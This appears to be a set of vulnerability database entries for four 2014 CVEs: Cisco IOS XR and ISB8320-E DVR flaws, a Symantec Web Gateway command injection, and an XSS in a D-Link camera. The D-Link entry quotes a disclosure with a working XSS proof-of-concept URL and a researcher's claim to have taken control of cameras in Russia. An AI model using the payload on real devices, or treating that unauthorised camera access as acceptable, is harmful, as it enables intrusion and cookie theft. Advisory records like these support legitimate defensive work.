VAR-201412-0300 CVE-2014-8014 Cisco IOS XR Service disruption in (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco IOS XR allows remote attackers to cause a denial of service (RSVP process reload) via a malformed RSVP packet, aka Bug ID CSCub63710. Vendors have confirmed this vulnerability Bug ID CSCub63710 It is released as. Supplementary information : CWE Vulnerability type by CWE-19: Data Handling ( Data processing ) Has been identified. http://cwe.mitre.org/data/definitions/19.htmlService disruption by a third party (RSVP Reload process ) There is a possibility of being put into a state. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches
VAR-201501-0654 CVE-2014-9517 D-link IP camera DCS-2103 Firmware cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in D-link IP camera DCS-2103 with firmware before 1.20 allows remote attackers to inject arbitrary web script or HTML via the QUERY_STRING to vb.htm. D-link IP camera The DCS-2103 is a camera for IP surveillance solutions. Dcs-2103 Hd Cube Network Camera is prone to a cross-site scripting vulnerability. If previous Path Traversal and Full path disclosure vulnerabilities were post-auth, then these BF and XSS vulnerabilities are pre-auth. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. For BF vulnerability version 1.20 and previous versions are vulnerable. Developers refused to fix BF vulnerability (they think that it's problem of a user to have strong password) and XSS vulnerability was fixed in firmware version 1.20. ---------- Details: ---------- Brute Force (WASC-11): http://site No protection from BF attacks. Cross-Site Scripting (WASC-08): http://site/vb.htm?%3Cscript%3Ealert%28document.cookie%29%3C/script%3E ------------ Timeline: ------------ 2014.05.22-2014.11.26 - conversation with D-Link about vulnerabilities in DAP-1360. 2014.08.01 - announced at my site about vulnerabilities in DCS-2103. 2014.11.14-2014.12.13 - conversation with D-Link about vulnerabilities in DCS-2103. 2014.12.16 - disclosed at my site (http://websecurity.com.ua/7288/). I found this and other web cameras during summer to watch terrorists activities in Donetsk and Lugansks regions of Ukraine (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html) and also I took under control web cameras in Russia (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-December/009065.html). Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua
VAR-201412-0596 CVE-2014-7285 Symantec Web Gateway Any management console running on the appliance OS Command execution vulnerability CVSS V2: 6.5
CVSS V3: -
Severity: MEDIUM
The management console on the Symantec Web Gateway (SWG) appliance before 5.2.2 allows remote authenticated users to execute arbitrary OS commands by injecting command strings into unspecified PHP scripts. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. Symantec Web Gateway is prone to a command-injection vulnerability. Successfully exploiting this issue may allow an attacker to execute arbitrary OS commands in the context of the affected appliance. Versions prior to Symantec Web Gateway 5.2.2 are vulnerable. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more
VAR-201412-0291 CVE-2014-8006 Cisco ISB8320-E High-Definition IP-Only DVR of Disaster Recovery Vulnerabilities that bypass authentication in functions CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The Disaster Recovery (DRA) feature on the Cisco ISB8320-E High-Definition IP-Only DVR allows remote attackers to bypass authentication by establishing a TELNET session during a recovery boot, aka Bug ID CSCup85422. The Cisco ISB8320-E High-Definition IP-Only DVR is a Cisco HD DVR. Cisco ISB8320-E High-Definition IP-Only DVR has a security vulnerability that could allow an attacker to exploit this vulnerability to bypass certain security restrictions or to perform unauthorized access on an affected device. This issue is tracked by Cisco Bug ID CSCup85422